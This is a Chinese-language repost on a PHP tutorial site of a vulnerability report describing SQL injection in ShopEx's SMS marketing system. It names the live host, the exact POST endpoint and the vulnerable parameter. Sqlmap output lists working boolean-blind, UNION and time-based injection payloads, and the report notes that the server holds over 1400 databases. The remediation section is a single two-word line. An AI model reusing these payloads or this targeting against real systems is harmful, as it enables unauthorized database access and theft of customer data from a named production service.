网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

ShopEx短信通系统sql注入(POST) - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] ShopEx无线营销系统,1400多个库网站:http: live shopex cn 注入点http: live shopex cn:80 index php passport passport sel_region (POST)参数p_region_idsqlmap identified the following injection...

ShopEx无线营销系统,1400多个库
 
网站:
 
http://live.shopex.cn/
 
 
 
注入点
 
http://live.shopex.cn:80/index.php/passport/passport/sel_region (POST)
 
参数p_region_id
 
sqlmap identified the following injection points with a total of 80 HTTP(s) requests:

---

Place: (custom) POST

Parameter: #1*

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: p_region_id=' RLIKE IF(7814=7814,0x705f726567696f6e5f69643d2a,0x28) AND 'CNmq'='CNmq



Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: p_region_id=' UNION ALL SELECT CONCAT(0x7174677a71,0x677754534a75516c5142,0x7176626271),NULL#



Type: AND/OR time-based blind

Title: MySQL < 5.0.12 AND time-based blind (heavy query)

Payload: p_region_id=' AND 1203=BENCHMARK(5000000,MD5(0x4f757a6a)) AND 'WAGO'='WAGO

---

web application technology: Nginx, PHP 5.2.13

back-end DBMS: MySQL >= 5.0.0

 

 
用户:
 
 
1400多个库,也太多了吧:
 

 
修复方案:
参数过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论